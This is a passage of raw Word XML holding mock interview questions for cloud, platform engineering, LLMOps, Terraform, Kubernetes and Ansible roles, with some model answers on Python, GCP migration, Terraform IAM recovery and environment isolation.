          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design a production LLM-backed service on GCP, covering the API gateway, model routing, caching, observability, and cost controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you build an internal LLM gateway that handles authentication, per-team rate limiting, token budget enforcement, and multi-provider fallback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you defend an LLM application against prompt injection and data exfiltration from untrusted user input or retrieved documents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. An AI agent can call internal tools and APIs. How would you sandbox tool execution, enforce least privilege, and prevent unintended destructive actions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you build an automated evaluation and regression suite for LLM output quality before shipping a prompt or model change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LLMOps / GenAI Production</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8.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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 44 - Resume Deep-Dive: GCP, Terraform, Kubernetes Platform Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through the GCP landing zone you designed, including project hierarchy, Shared VPC, IAM governance, and policy-as-code. What tradeoffs did you make?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. You manage production GKE clusters including node pools, upgrades, autoscaling, and RBAC. Walk me through your process for a zero-downtime cluster upgrade.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. You integrated Terraform Enterprise with Git-based CI/CD, Harness, Jira, and ServiceNow for self-service delivery. How did approvals and change management work end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. You provisioned GPU-enabled GKE clusters with NVIDIA L4/A100 nodes. How did you handle node pool sizing, taints/tolerations, and spot/preemptible GPUs for cost control?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. At 7 years of experience, how would you demonstrate technical leadership across multiple teams during a platform migration, not just individual execution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Resume Deep-Dive</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 45 - Platform Engineering / Internal Developer Platform Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you draw the line between what a platform team owns and what application teams own, and how would you avoid the platform becoming a bottleneck?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design multi-tenancy for an internal developer platform so one team's misconfiguration or spike can't affect another team's workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What SLAs or SLOs would you define for your own platform team, and how would you measure whether the platform itself is reliable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you design self-service ephemeral preview environments for pull requests on top of GKE, Terraform, and CI/CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you prevent manual console changes from undermining your Terraform-based golden paths, without blocking legitimate emergency fixes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you design a service catalog that tracks ownership, dependencies, production-readiness status, and on-call rotation for every service on the platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you enforce security and compliance guardrails inside a self-service platform without turning every request into a manual approval bottleneck?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you decide between building a custom internal developer platform versus adopting Backstage, Port, or another off-the-shelf IDP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Engineering</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 46 - Ansible / Configuration Management Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is Ansible, and how does its agentless, push-based model differ from Terraform or Puppet/Chef?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you ensure Ansible playbooks are idempotent, and what happens when a task isn't naturally idempotent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you structure reusable Ansible roles for OS patching, configuration management, and application deployment across many teams?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you manage secrets in Ansible using Vault, and how would you rotate a vaulted secret without redistributing it manually?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. When would you use Ansible instead of Terraform, and how would you combine them in the same pipeline, for example Terraform provisions and Ansible configures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you run Ansible playbooks against thousands of hosts efficiently, and what would you do about serial execution, forks, and failure handling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you test Ansible roles and playbooks before running them in production, for example with Molecule or a CI pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. You used Ansible for backup automation and disaster recovery. Walk me through how a playbook-driven DR runbook would work end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Ansible</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 47 - Today's Audio Interview Recap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you design reusable infrastructure modules? How do you handle reusable modules with strict state and credential isolation? How do approval workflows reduce the blast radius of infrastructure changes?</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design reusable infrastructure modules? How do you handle reusable modules with strict state and credential isolation? How do approval workflows reduce the blast radius of infrastructure changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform change safety: When a Terraform plan shows a destroy and replace for a critical resource, what signals and guardrails do you rely on to decide whether to proceed, redesign, or block the change?</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Terraform change safety: When a Terraform plan shows a destroy and replace for a critical resource, what signals and guardrails do you rely on to decide whether to proceed, redesign, or block the change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Incident response and observability: Customers report intermittent 5xx errors and P95 latency spikes. Walk me through your observability-driven triage sequence across metrics, logs, and traces. How do you isolate the failing dependency?</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Incident response and observability: Customers report intermittent 5xx errors and P95 latency spikes. Walk me through your observability-driven triage sequence across metrics, logs, and traces. How do you isolate the failing dependency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. SLIs, SLOs, and alerting: How do you define customer-centric SLIs, SLOs, and actionable alerts? How do you filter noisy infrastructure signals? How do you catch both fast outages and slow degradation without paging on transient spikes?</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SLIs, SLOs, and alerting: How do you define customer-centric SLIs, SLOs, and actionable alerts? How do you filter noisy infrastructure signals? How do you catch both fast outages and slow degradation without paging on transient spikes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5.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200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Tell me about yourself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</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spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Describe your experience with cloud platforms, Kubernetes, Terraform, and DevOps.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your experience with cloud platforms, Kubernetes, Terraform, and DevOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you approach infrastructure changes in production to minimize customer impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Readiness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Readiness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approach infrastructure changes in production to minimize customer impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 48 - Today AI/Python/Cloud/SRE Recap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Today interview 2026-07-06 - AI engineering libraries: What Python libraries are most useful for AI Engineering nowadays?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AI/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Group the answer by lifecycle. For model and data work: NumPy, pandas, scikit-learn, PyTorch, TensorFlow, Hugging Face Transformers, sentence-transformers, and XGBoost/LightGBM are common. For GenAI and RAG: LangChain, LlamaIndex, OpenAI/Anthropic/Vertex AI SDKs, FAISS/Chroma/Milvus/Pinecone clients, and evaluation tools like Ragas or DeepEval. For production AI engineering: FastAPI, Pydantic, MLflow, Airflow/Prefect, Kubernetes clients, OpenTelemetry, Prometheus clients, pytest, and cloud SDKs matter because the job is not only model building; it is packaging, serving, monitoring, evaluating, and operating AI systems safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Today interview 2026-07-06 - Python multiprocessing: Explain multiprocessing in Python. When should you use multiprocessing instead of multithreading?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Today interview 2026-07-06 - Python identity: Explain the difference between == and is in Python, using list examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: == compares values; is compares object identity. With a = [1, 2], b = [1, 2], and c = a: a == b is True because both lists contain the same values; a is b is False because they are two different list objects; a is c is True because c points to the same list object as a. In interviews, mention that is should normally be used for identity checks such as x is None, not for normal value comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Today interview 2026-07-06 - AWS to GCP migration: Suppose a client has an application running on AWS. How would you migrate it to GCP across discovery, network, IAM, database, storage, CI/CD, validation, cutover, and rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Migration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with discovery: inventory services, dependencies, traffic, data size, RTO/RPO, compliance, and current IaC. Map AWS constructs to GCP equivalents: VPC/subnets/security groups to VPC/firewall rules, IAM roles to service accounts/IAM bindings, S3 to Cloud Storage, RDS to Cloud SQL/AlloyDB, EKS/ECS to GKE/Cloud Run, CloudWatch to Cloud Operations. Build landing zone, networking, IAM, logging, and CI/CD first. Migrate data with replication where possible, run parallel validation, deploy the app in GCP using immutable artifacts, test functional, performance, security, and DR paths, then cut over gradually through DNS, load balancer, or traffic splitting. Keep rollback ready by leaving AWS healthy until GCP has passed agreed success criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Today interview 2026-07-06 - Terraform IAM recovery: A Terraform change accidentally removed production Service Account permissions. How would you debug and recover?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IAM Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat it as an incident first: stop further applies, identify impacted service accounts and customer impact, and restore the minimum required permissions quickly from a known-good plan, previous state, audit logs, or a break-glass runbook. Check CI/CD logs, Terraform plan/apply output, state history, Git diff, provider change, and Cloud Audit Logs for SetIamPolicy or binding changes. If workloads are down, temporarily re-grant least-privilege roles manually or through an emergency Terraform patch, then validate services recover. After mitigation, fix the root cause: avoid authoritative IAM resources where additive bindings are safer, add policy-as-code checks, require plan review for IAM diffs, isolate state blast radius, and add tests that detect removal of critical bindings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Today interview 2026-07-06 - Multi-environment architecture: Design a multi-environment architecture for Dev, QA, and Prod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate projects/accounts per environment, with clear folder hierarchy, separate IAM, separate Terraform state, separate service accounts, and environment-specific network boundaries. Dev can be lower-cost and more permissive for experimentation, QA/staging should mirror prod topology closely enough for reliable testing, and prod should have stronger approvals, HA, backup, monitoring, and access controls. Reuse the same Terraform modules and deployment templates across environments, changing only inputs such as sizing, replicas, CIDRs, retention, and approval gates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Today interview 2026-07-06 - Terraform state isolation: How would you isolate infrastructure and Terraform state across environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use separate state files/backends per environment, separate backend paths or workspaces with strict naming, separate credentials/service accounts, and ideally separate GCP projects or folders. Keep shared modules versioned separately from live environment code. Limit each state file's blast radius by domain: network, IAM, GKE, databases, and app layer should not all be in one huge state if ownership and risk differ. Enable state locking, versioning, audit logs, and least-privilege access to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Today interview 2026-07-06 - NetworkPolicy and admission control: How do you pair Kubernetes Network Policies with Admission Controllers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
